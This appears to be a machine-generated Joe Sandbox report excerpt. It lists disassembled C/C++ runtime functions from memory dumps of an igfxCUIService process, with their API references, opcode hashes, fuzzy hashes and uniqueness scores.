                                  • Associated: 00000007.00000002.828679231.0000000000D6E000.00000004.00020000.sdmp Download File
                                  • Associated: 00000007.00000002.828708646.0000000000D71000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_d10000_igfxCUIService.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                  • String ID:
                                  • API String ID: 161543041-0
                                  • Opcode ID: 59d7e2ed12a7b79e771956cd2fb1be106e0b73490395fa7c0e68fde91a3e2a5b
                                  • Instruction ID: 8b8f4ddf13ac47a9eada2b4a7702b25f9588bd0f8d1f7c54e6b4e255539962b6
                                  • Opcode Fuzzy Hash: 59d7e2ed12a7b79e771956cd2fb1be106e0b73490395fa7c0e68fde91a3e2a5b
                                  • Instruction Fuzzy Hash: 243190716043419FEB20AA79D846B5BB3EAEF02310F184529F09AD7191DF74ED40CB31
                                  Uniqueness

                                  Uniqueness Score: 0.13%

                                  Function 00D4CC03, Relevance: 18.4, APIs: 12, Instructions: 374COMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.828162617.0000000000D11000.00000020.00020000.sdmp, Offset: 00D10000, based on PE: true
                                  • Associated: 00000007.00000002.828131915.0000000000D10000.00000002.00020000.sdmp Download File
                                  • Associated: 00000007.00000002.828629700.0000000000D5A000.00000002.00020000.sdmp Download File
                                  • Associated: 00000007.00000002.828679231.0000000000D6E000.00000004.00020000.sdmp Download File
                                  • Associated: 00000007.00000002.828708646.0000000000D71000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_d10000_igfxCUIService.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: _free
                                  • String ID:
                                  • API String ID: 269201875-0
                                  • Opcode ID: a0466fa94846f970d963981f2cee54097b58ad89171fd4084f3e333793f92a66
                                  • Instruction ID: bb0ab3e815b3a69f8f4ecba656063053715850fa4e6f9b36b98e4c72ab0f78ae
                                  • Opcode Fuzzy Hash: a0466fa94846f970d963981f2cee54097b58ad89171fd4084f3e333793f92a66
                                  • Instruction Fuzzy Hash: 71C11272E41204ABDB60DBA8CC83FDA77F8EF09700F144565FA49EB282D6B4D94197B4
                                  Uniqueness

                                  Uniqueness Score: 0.02%

                                  Function 00D39228, Relevance: 16.1, APIs: 6, Strings: 3, Instructions: 308UNIQUELIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  • IsInExceptionSpec.LIBVCRUNTIME ref: 00D39323
                                  • type_info::operator==.LIBVCRUNTIME ref: 00D3934A
                                  • ___TypeMatch.LIBVCRUNTIME ref: 00D39456
                                  • IsInExceptionSpec.LIBVCRUNTIME ref: 00D39531
                                  • _UnwindNestedFrames.LIBCMT ref: 00D395B8
                                  • CallUnexpected.LIBVCRUNTIME ref: 00D395D3
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.828162617.0000000000D11000.00000020.00020000.sdmp, Offset: 00D10000, based on PE: true
                                  • Associated: 00000007.00000002.828131915.0000000000D10000.00000002.00020000.sdmp Download File
                                  • Associated: 00000007.00000002.828629700.0000000000D5A000.00000002.00020000.sdmp Download File
                                  • Associated: 00000007.00000002.828679231.0000000000D6E000.00000004.00020000.sdmp Download File
                                  • Associated: 00000007.00000002.828708646.0000000000D71000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_d10000_igfxCUIService.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ExceptionSpec$CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                                  • String ID: csm$csm$csm
                                  • API String ID: 2123188842-393685449
                                  • Opcode ID: fcce4f60338aff63c1642cfc1050934616b011c6851584e821389dde02f9106a
                                  • Instruction ID: cc36048c6943c62e5f00492ec752ca0167d328f4834b15c3ea054ce0e73e695c
                                  • Opcode Fuzzy Hash: fcce4f60338aff63c1642cfc1050934616b011c6851584e821389dde02f9106a
                                  • Instruction Fuzzy Hash: 6DC147B1800219EFCF25DFA8D8919AEFBB5EF04310F08415AF8156B252D7B5DA91CBB1
                                  Uniqueness

                                  Uniqueness Score: 100.00%

                                  Function 00D46E55, Relevance: 15.1, APIs: 10, Instructions: 69COMMON
                                  Download Yara Rule
                                  APIs
                                  • _free.LIBCMT ref: 00D46E6B
                                    • Part of subcall function 00D468D3: HeapFree.KERNEL32(00000000,00000000,?,00D4D25C,?,00000000,?,?,?,00D4D4FF,?,00000007,?,?,00D4DA9C,?), ref: 00D468E9
                                    • Part of subcall function 00D468D3: GetLastError.KERNEL32(?,?,00D4D25C,?,00000000,?,?,?,00D4D4FF,?,00000007,?,?,00D4DA9C,?,?), ref: 00D468FB
                                  • _free.LIBCMT ref: 00D46E77
                                  • _free.LIBCMT ref: 00D46E82
                                  • _free.LIBCMT ref: 00D46E8D
                                  • _free.LIBCMT ref: 00D46E98
                                  • _free.LIBCMT ref: 00D46EA3
                                  • _free.LIBCMT ref: 00D46EAE
                                  • _free.LIBCMT ref: 00D46EB9
                                  • _free.LIBCMT ref: 00D46EC4
                                  • _free.LIBCMT ref: 00D46ED2
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.828162617.0000000000D11000.00000020.00020000.sdmp, Offset: 00D10000, based on PE: true
                                  • Associated: 00000007.00000002.828131915.0000000000D10000.00000002.00020000.sdmp Download File
                                  • Associated: 00000007.00000002.828629700.0000000000D5A000.00000002.00020000.sdmp Download File
                                  • Associated: 00000007.00000002.828679231.0000000000D6E000.00000004.00020000.sdmp Download File
                                  • Associated: 00000007.00000002.828708646.0000000000D71000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_d10000_igfxCUIService.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: _free$ErrorFreeHeapLast
                                  • String ID:
                                  • API String ID: 776569668-0
                                  • Opcode ID: ecd1ebe10c6030474237ca878638c30ef078a17363d317cc8ca8c94f0c6e37e9
                                  • Instruction ID: b6e6cf6218ebff1fe3b4eb5e91e70ac7cf3a7eeededc773b2316796ae4496372
                                  • Opcode Fuzzy Hash: ecd1ebe10c6030474237ca878638c30ef078a17363d317cc8ca8c94f0c6e37e9
                                  • Instruction Fuzzy Hash: DB218576D0411CBFCB41EFA4C881DDE7BB9EF09340B0042A6B5169B161DB75EA448BA1
                                  Uniqueness

                                  Uniqueness Score: 0.02%

                                  Function 00D301D0, Relevance: 14.4, APIs: 2, Strings: 6, Instructions: 389UNIQUE
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.828162617.0000000000D11000.00000020.00020000.sdmp, Offset: 00D10000, based on PE: true
                                  • Associated: 00000007.00000002.828131915.0000000000D10000.00000002.00020000.sdmp Download File
                                  • Associated: 00000007.00000002.828629700.0000000000D5A000.00000002.00020000.sdmp Download File
                                  • Associated: 00000007.00000002.828679231.0000000000D6E000.00000004.00020000.sdmp Download File
                                  • Associated: 00000007.00000002.828708646.0000000000D71000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_d10000_igfxCUIService.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: ,$array$object$object key$object separator$value
                                  • API String ID: 0-1191195158
                                  • Opcode ID: d97f1ac0e94a892bf19948025ac3cdf2d2c775f073f2070ac763032a318eb1cb
                                  • Instruction ID: 848de86797410238a9081f8aa742a9cc5a079cae3ad14105a2fa36b64044fb15
                                  • Opcode Fuzzy Hash: d97f1ac0e94a892bf19948025ac3cdf2d2c775f073f2070ac763032a318eb1cb
                                  • Instruction Fuzzy Hash: 4C027930904258DFDB21DF64C855BEEFBB4BF19304F148199D449A7682DB70AA88CFB1
                                  Uniqueness

                                  Uniqueness Score: 100.00%

                                  Function 00D4D023, Relevance: 13.7, APIs: 9, Instructions: 200COMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.828162617.0000000000D11000.00000020.00020000.sdmp, Offset: 00D10000, based on PE: true
                                  • Associated: 00000007.00000002.828131915.0000000000D10000.00000002.00020000.sdmp Download File
                                  • Associated: 00000007.00000002.828629700.0000000000D5A000.00000002.00020000.sdmp Download File
                                  • Associated: 00000007.00000002.828679231.0000000000D6E000.00000004.00020000.sdmp Download File
                                  • Associated: 00000007.00000002.828708646.0000000000D71000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_d10000_igfxCUIService.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: _free
                                  • String ID:
                                  • API String ID: 269201875-0
                                  • Opcode ID: 878e9c5841c591da3b709aaa1df4e88c6314403233c7e49f8a3d6be34a9274dd
                                  • Instruction ID: a24e323e8bcf549c1a2e42cae9de154f9ba6a281f926fbcda962a2ef4ddead19
                                  • Opcode Fuzzy Hash: 878e9c5841c591da3b709aaa1df4e88c6314403233c7e49f8a3d6be34a9274dd
                                  • Instruction Fuzzy Hash: 2961A371900745AFDB20DF64C881BABB7EAEB46310F244569E996EB281EB70DD40CB71
                                  Uniqueness

                                  Uniqueness Score: 0.02%

                                  Function 00D4BE53, Relevance: 12.2, APIs: 8, Instructions: 203COMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.828162617.0000000000D11000.00000020.00020000.sdmp, Offset: 00D10000, based on PE: true
                                  • Associated: 00000007.00000002.828131915.0000000000D10000.00000002.00020000.sdmp Download File
                                  • Associated: 00000007.00000002.828629700.0000000000D5A000.00000002.00020000.sdmp Download File
                                  • Associated: 00000007.00000002.828679231.0000000000D6E000.00000004.00020000.sdmp Download File
                                  • Associated: 00000007.00000002.828708646.0000000000D71000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_d10000_igfxCUIService.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: _free$___from_strstr_to_strchr
                                  • String ID:
                                  • API String ID: 3409252457-0
                                  • Opcode ID: 66d983d8b719662b9fc094d9e8770de51a68a3dbeb7b26846c20cc9fa49a60a9
                                  • Instruction ID: 39320663820526d003a85ae972aa2c1eca5d034ea790199cbc04cfcded8f9e0d
                                  • Opcode Fuzzy Hash: 66d983d8b719662b9fc094d9e8770de51a68a3dbeb7b26846c20cc9fa49a60a9
                                  • Instruction Fuzzy Hash: FE51F671E05301EFDF24AFB8DC41AAE7BA4EF16320F18416AE51597282EB72C944CB71
                                  Uniqueness

                                  Uniqueness Score: 1.23%

                                  Function 00D369F0, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 120UNIQUE
                                  Download Yara Rule
                                  APIs
                                  • _ValidateLocalCookies.LIBCMT ref: 00D36A27
                                  • ___except_validate_context_record.LIBVCRUNTIME ref: 00D36A2F
                                  • _ValidateLocalCookies.LIBCMT ref: 00D36AB8
                                  • __IsNonwritableInCurrentImage.LIBCMT ref: 00D36AE3
                                  • _ValidateLocalCookies.LIBCMT ref: 00D36B38
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.828162617.0000000000D11000.00000020.00020000.sdmp, Offset: 00D10000, based on PE: true
                                  • Associated: 00000007.00000002.828131915.0000000000D10000.00000002.00020000.sdmp Download File
                                  • Associated: 00000007.00000002.828629700.0000000000D5A000.00000002.00020000.sdmp Download File
                                  • Associated: 00000007.00000002.828679231.0000000000D6E000.00000004.00020000.sdmp Download File
                                  • Associated: 00000007.00000002.828708646.0000000000D71000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_d10000_igfxCUIService.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                  • String ID: csm
                                  • API String ID: 1170836740-1018135373
                                  • Opcode ID: a43b723f64beb96c94ef84916997a45369c2d5a72de94ee8341042adf01b8371
                                  • Instruction ID: 458a3f057cedecebc6b195e24d932bf14217a25b8dc931bc612b0430fd191a21
                                  • Opcode Fuzzy Hash: a43b723f64beb96c94ef84916997a45369c2d5a72de94ee8341042adf01b8371
                                  • Instruction Fuzzy Hash: 58415F34A00219AFCF10DF68C885A9EBBB5EF45314F18C155E815AB392D771E915CFB1
                                  Uniqueness

                                  Uniqueness Score: 100.00%

                                  Function 00D4955F, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 77COMMONLIBRARYCODE
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.828162617.0000000000D11000.00000020.00020000.sdmp, Offset: 00D10000, based on PE: true
                                  • Associated: 00000007.00000002.828131915.0000000000D10000.00000002.00020000.sdmp Download File
                                  • Associated: 00000007.00000002.828629700.0000000000D5A000.00000002.00020000.sdmp Download File
                                  • Associated: 00000007.00000002.828679231.0000000000D6E000.00000004.00020000.sdmp Download File
                                  • Associated: 00000007.00000002.828708646.0000000000D71000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_d10000_igfxCUIService.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: api-ms-$ext-ms-
                                  • API String ID: 0-537541572
                                  • Opcode ID: c93a5f2809784a8e9b4a305deccbdd547cf17559685b82dce7786869dc4eb308
                                  • Instruction ID: a1c102e1a43f54678f6f1c4e73af500e84c05dac3564db432e3fabf36ed2a65d
                                  • Opcode Fuzzy Hash: c93a5f2809784a8e9b4a305deccbdd547cf17559685b82dce7786869dc4eb308
                                  • Instruction Fuzzy Hash: 2B21D631A05720ABCB23DB6A9CA5A2BB7589F15761F290620FE46E7395DB34DD00C6F0
                                  Uniqueness

                                  Uniqueness Score: 0.38%

                                  Function 00D4D4E6, Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00D4D232: _free.LIBCMT ref: 00D4D257
                                  • _free.LIBCMT ref: 00D4D534
                                    • Part of subcall function 00D468D3: HeapFree.KERNEL32(00000000,00000000,?,00D4D25C,?,00000000,?,?,?,00D4D4FF,?,00000007,?,?,00D4DA9C,?), ref: 00D468E9
                                    • Part of subcall function 00D468D3: GetLastError.KERNEL32(?,?,00D4D25C,?,00000000,?,?,?,00D4D4FF,?,00000007,?,?,00D4DA9C,?,?), ref: 00D468FB
                                  • _free.LIBCMT ref: 00D4D53F
                                  • _free.LIBCMT ref: 00D4D54A
                                  • _free.LIBCMT ref: 00D4D59E
                                  • _free.LIBCMT ref: 00D4D5A9
                                  • _free.LIBCMT ref: 00D4D5B4
                                  • _free.LIBCMT ref: 00D4D5BF
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.828162617.0000000000D11000.00000020.00020000.sdmp, Offset: 00D10000, based on PE: true
                                  • Associated: 00000007.00000002.828131915.0000000000D10000.00000002.00020000.sdmp Download File
                                  • Associated: 00000007.00000002.828629700.0000000000D5A000.00000002.00020000.sdmp Download File
                                  • Associated: 00000007.00000002.828679231.0000000000D6E000.00000004.00020000.sdmp Download File
                                  • Associated: 00000007.00000002.828708646.0000000000D71000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_d10000_igfxCUIService.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: _free$ErrorFreeHeapLast
                                  • String ID:
                                  • API String ID: 776569668-0
                                  • Opcode ID: 084be014b57c9f392aec073f6a7128653e534da61f4d2bc4e9e29790ebdef3b4
                                  • Instruction ID: 46635caa9dc1242521580c59d0ad70cd9d8bb7f16c9524770506731ae39ef351
                                  • Opcode Fuzzy Hash: 084be014b57c9f392aec073f6a7128653e534da61f4d2bc4e9e29790ebdef3b4
                                  • Instruction Fuzzy Hash: E0117C31581B44ABD620BBB0DC87FCB779EEF02700F404C25B29AAA092DAB8F5058775
                                  Uniqueness

                                  Uniqueness Score: 0.02%

                                  Function 00D48032, Relevance: 9.3, APIs: 6, Instructions: 318fileCOMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  • GetConsoleCP.KERNEL32(00D41707,00000000,?), ref: 00D4807A
                                  • __fassign.LIBCMT ref: 00D48259
                                  • __fassign.LIBCMT ref: 00D48276
                                  • WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00D482BE
                                  • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 00D482FE
                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 00D483AA
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.828162617.0000000000D11000.00000020.00020000.sdmp, Offset: 00D10000, based on PE: true
                                  • Associated: 00000007.00000002.828131915.0000000000D10000.00000002.00020000.sdmp Download File
                                  • Associated: 00000007.00000002.828629700.0000000000D5A000.00000002.00020000.sdmp Download File
                                  • Associated: 00000007.00000002.828679231.0000000000D6E000.00000004.00020000.sdmp Download File
                                  • Associated: 00000007.00000002.828708646.0000000000D71000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_d10000_igfxCUIService.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: FileWrite__fassign$ConsoleErrorLast
                                  • String ID:
                                  • API String ID: 4031098158-0
                                  • Opcode ID: f250e20d13f1f420bce04a8653f8b623ebedbb53ed99f1eb5400a8656643b02a
                                  • Instruction ID: 0b793352faf0718c5f91fef561519b3a71d8306f464e07bd66b8709021be8e4d
                                  • Opcode Fuzzy Hash: f250e20d13f1f420bce04a8653f8b623ebedbb53ed99f1eb5400a8656643b02a
                                  • Instruction Fuzzy Hash: A7D18AB5D002589FCF15CFA8D9809EDBBB5EF49340F28416AE855FB342DB30A946DB60
                                  Uniqueness

                                  Uniqueness Score: 0.81%

                                  Function 00D2B390, Relevance: 9.2, APIs: 4, Strings: 1, Instructions: 491UNIQUE
                                  Download Yara Rule
                                  APIs
                                  • ___std_exception_destroy.LIBVCRUNTIME ref: 00D2B5A7
                                  • ___std_exception_destroy.LIBVCRUNTIME ref: 00D2B5BD
                                  • ___std_exception_destroy.LIBVCRUNTIME ref: 00D2B9F7
                                  • ___std_exception_destroy.LIBVCRUNTIME ref: 00D2BA0D
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.828162617.0000000000D11000.00000020.00020000.sdmp, Offset: 00D10000, based on PE: true
                                  • Associated: 00000007.00000002.828131915.0000000000D10000.00000002.00020000.sdmp Download File
                                  • Associated: 00000007.00000002.828629700.0000000000D5A000.00000002.00020000.sdmp Download File
                                  • Associated: 00000007.00000002.828679231.0000000000D6E000.00000004.00020000.sdmp Download File
                                  • Associated: 00000007.00000002.828708646.0000000000D71000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_d10000_igfxCUIService.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ___std_exception_destroy
                                  • String ID: value
                                  • API String ID: 4194217158-494360628
                                  • Opcode ID: 58c1fce73e7ab1849f9128281837b600caa63b7e7b46a6dc683acc1e60110b14
                                  • Instruction ID: 47b97b593e26407874bd01089c3b06d37b1f7faf662a6b85038d3b48bdad7111
                                  • Opcode Fuzzy Hash: 58c1fce73e7ab1849f9128281837b600caa63b7e7b46a6dc683acc1e60110b14
                                  • Instruction Fuzzy Hash: 0E22B1309002698FDB28CF24D894BEEFBB5AF55314F1482D9D459A7782DBB46A84CF70
                                  Uniqueness

                                  Uniqueness Score: 100.00%

                                  Function 00D29CB0, Relevance: 9.1, APIs: 6, Instructions: 118COMMON
                                  Download Yara Rule
                                  APIs
                                  • std::_Lockit::_Lockit.LIBCPMT ref: 00D29CF0
                                  • std::_Lockit::_Lockit.LIBCPMT ref: 00D29D12
                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 00D29D32
                                  • __Getctype.LIBCPMT ref: 00D29DCB
                                  • std::_Facet_Register.LIBCPMT ref: 00D29DEA
                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 00D29E02
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.828162617.0000000000D11000.00000020.00020000.sdmp, Offset: 00D10000, based on PE: true
                                  • Associated: 00000007.00000002.828131915.0000000000D10000.00000002.00020000.sdmp Download File
                                  • Associated: 00000007.00000002.828629700.0000000000D5A000.00000002.00020000.sdmp Download File
                                  • Associated: 00000007.00000002.828679231.0000000000D6E000.00000004.00020000.sdmp Download File
                                  • Associated: 00000007.00000002.828708646.0000000000D71000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_d10000_igfxCUIService.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_GetctypeRegister
                                  • String ID:
                                  • API String ID: 1102183713-0
                                  • Opcode ID: eee8a219fa329ea7a6c4e1d2834a278567346e7289b3875944ae383c8e8ac9d7
                                  • Instruction ID: 2d672395e98e6eb4d3bca2ca55827135e0df6da2278d17913c50b6633e81bb1f
                                  • Opcode Fuzzy Hash: eee8a219fa329ea7a6c4e1d2834a278567346e7289b3875944ae383c8e8ac9d7
                                  • Instruction Fuzzy Hash: B841C2719007249FCB10DF58E891AAAF7B4EF24724F188169E805AB391EB70ED45CBF1
                                  Uniqueness

                                  Uniqueness Score: 1.47%

                                  Function 00D38EBA, Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  • GetLastError.KERNEL32(?,?,00D38EB1,00D370D0,00D34FB8), ref: 00D38EC8
                                  • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00D38ED6
                                  • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00D38EEF
                                  • SetLastError.KERNEL32(00000000,00D38EB1,00D370D0,00D34FB8), ref: 00D38F41
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.828162617.0000000000D11000.00000020.00020000.sdmp, Offset: 00D10000, based on PE: true
                                  • Associated: 00000007.00000002.828131915.0000000000D10000.00000002.00020000.sdmp Download File
                                  • Associated: 00000007.00000002.828629700.0000000000D5A000.00000002.00020000.sdmp Download File
                                  • Associated: 00000007.00000002.828679231.0000000000D6E000.00000004.00020000.sdmp Download File
                                  • Associated: 00000007.00000002.828708646.0000000000D71000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_d10000_igfxCUIService.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ErrorLastValue___vcrt_
                                  • String ID:
                                  • API String ID: 3852720340-0
                                  • Opcode ID: 6f578b3a19669943ed79fe67f3a61fa9414917f96e976f7cb9a01c7d3abedd7f
                                  • Instruction ID: 932afc871eb456264fba511186c9afe761371cde813b61ae457033561861ab96
                                  • Opcode Fuzzy Hash: 6f578b3a19669943ed79fe67f3a61fa9414917f96e976f7cb9a01c7d3abedd7f
                                  • Instruction Fuzzy Hash: 0601F73621D7215EAB24277DBC85A1A2745EF017B5F24033AF510951E0FFD3CC01A275
                                  Uniqueness

                                  Uniqueness Score: 0.24%

                                  Function 00D39F8E, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 62COMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  • FreeLibrary.KERNEL32(00000000,?,?,?,00D3A04F,?,?,00D6F874,00000000,?,00D3A17A,00000004,InitializeCriticalSectionEx,00D5E0F4,00D5E0FC,00000000), ref: 00D3A01E
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.828162617.0000000000D11000.00000020.00020000.sdmp, Offset: 00D10000, based on PE: true
                                  • Associated: 00000007.00000002.828131915.0000000000D10000.00000002.00020000.sdmp Download File
                                  • Associated: 00000007.00000002.828629700.0000000000D5A000.00000002.00020000.sdmp Download File
                                  • Associated: 00000007.00000002.828679231.0000000000D6E000.00000004.00020000.sdmp Download File
                                  • Associated: 00000007.00000002.828708646.0000000000D71000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_d10000_igfxCUIService.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: FreeLibrary
                                  • String ID: api-ms-
                                  • API String ID: 3664257935-2084034818
                                  • Opcode ID: d4a28ea1a639407333fda08172cca373aa0ef8b621fed710c5bb8f2a1cc83168
                                  • Instruction ID: 73f65357c6e988824561be34761318acaf777f06dffdf2946d414774480afcb9
                                  • Opcode Fuzzy Hash: d4a28ea1a639407333fda08172cca373aa0ef8b621fed710c5bb8f2a1cc83168
                                  • Instruction Fuzzy Hash: 7811A331B00731ABDB268B6CDC44B5973949F05761F280220EE94EB3C8D7B5ED0086F2
                                  Uniqueness

                                  Uniqueness Score: 1.64%

                                  Function 00D42B9F, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 30libraryloaderUNIQUELIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,00D42B94,00000000,?,00D42B5C,?,?,00000000), ref: 00D42BB4
                                  • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00D42BC7
                                  • FreeLibrary.KERNEL32(00000000,?,?,00D42B94,00000000,?,00D42B5C,?,?,00000000), ref: 00D42BEA
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.828162617.0000000000D11000.00000020.00020000.sdmp, Offset: 00D10000, based on PE: true
                                  • Associated: 00000007.00000002.828131915.0000000000D10000.00000002.00020000.sdmp Download File
                                  • Associated: 00000007.00000002.828629700.0000000000D5A000.00000002.00020000.sdmp Download File
                                  • Associated: 00000007.00000002.828679231.0000000000D6E000.00000004.00020000.sdmp Download File
                                  • Associated: 00000007.00000002.828708646.0000000000D71000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_d10000_igfxCUIService.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AddressFreeHandleLibraryModuleProc
                                  • String ID: CorExitProcess$mscoree.dll
                                  • API String ID: 4061214504-1276376045
                                  • Opcode ID: 0e194e06803a670e44d5de47e9c79f314003dbe4fde2fd2559b08fa078792031
                                  • Instruction ID: b4a45d3a8aa7bf84f5aa4b1e71452286cd48a367c1a4592ee872854cf7697aa3
                                  • Opcode Fuzzy Hash: 0e194e06803a670e44d5de47e9c79f314003dbe4fde2fd2559b08fa078792031
                                  • Instruction Fuzzy Hash: D8F01231515729FBDB119F55DC0AF9D7B64EF04756F144150FC05E22A4CB709E04EAB2
                                  Uniqueness

                                  Uniqueness Score: 100.00%

                                  Function 00D449EC, Relevance: 7.8, APIs: 5, Instructions: 264COMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00D46F6D: GetLastError.KERNEL32(00000008,?,00000000,00D4C55A,00D3591B,00D35961,?,00D357A8,00000000), ref: 00D46F72
                                    • Part of subcall function 00D46F6D: SetLastError.KERNEL32(00000000,00000006,000000FF,?,00D357A8,00000000), ref: 00D47010
                                  • _free.LIBCMT ref: 00D44CF9
                                  • _free.LIBCMT ref: 00D44D12
                                  • _free.LIBCMT ref: 00D44D50
                                  • _free.LIBCMT ref: 00D44D59
                                  • _free.LIBCMT ref: 00D44D65
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.828162617.0000000000D11000.00000020.00020000.sdmp, Offset: 00D10000, based on PE: true
                                  • Associated: 00000007.00000002.828131915.0000000000D10000.00000002.00020000.sdmp Download File
                                  • Associated: 00000007.00000002.828629700.0000000000D5A000.00000002.00020000.sdmp Download File
                                  • Associated: 00000007.00000002.828679231.0000000000D6E000.00000004.00020000.sdmp Download File
                                  • Associated: 00000007.00000002.828708646.0000000000D71000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_d10000_igfxCUIService.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: _free$ErrorLast
                                  • String ID:
                                  • API String ID: 3291180501-0
                                  • Opcode ID: 346a95f76387a9a5ac49287ee10227d171f767a7a5db4fb9c68c309846660543
                                  • Instruction ID: 3fb16c9207eda513fda6c7c0286fa0d3b8073990f3a706261207024834343567
                                  • Opcode Fuzzy Hash: 346a95f76387a9a5ac49287ee10227d171f767a7a5db4fb9c68c309846660543
                                  • Instruction Fuzzy Hash: 0AB12A75A012199FDB24DF18C889BADB7B4FF48304F1845EAE949A7390D771AE90CF60
                                  Uniqueness

                                  Uniqueness Score: 0.02%

                                  Function 00D543EA, Relevance: 7.7, APIs: 5, Instructions: 244COMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  • GetCPInfo.KERNEL32(00000000,00000001,?,7FFFFFFF,?,?,00D546A6,00000000,00000000,?,00000001,?,?,?,?,00000001), ref: 00D5448D
                                  • __alloca_probe_16.LIBCMT ref: 00D54543
                                  • __alloca_probe_16.LIBCMT ref: 00D545D9
                                  • __freea.LIBCMT ref: 00D54644
                                  • __freea.LIBCMT ref: 00D54650
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.828162617.0000000000D11000.00000020.00020000.sdmp, Offset: 00D10000, based on PE: true
                                  • Associated: 00000007.00000002.828131915.0000000000D10000.00000002.00020000.sdmp Download File
                                  • Associated: 00000007.00000002.828629700.0000000000D5A000.00000002.00020000.sdmp Download File
                                  • Associated: 00000007.00000002.828679231.0000000000D6E000.00000004.00020000.sdmp Download File
                                  • Associated: 00000007.00000002.828708646.0000000000D71000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
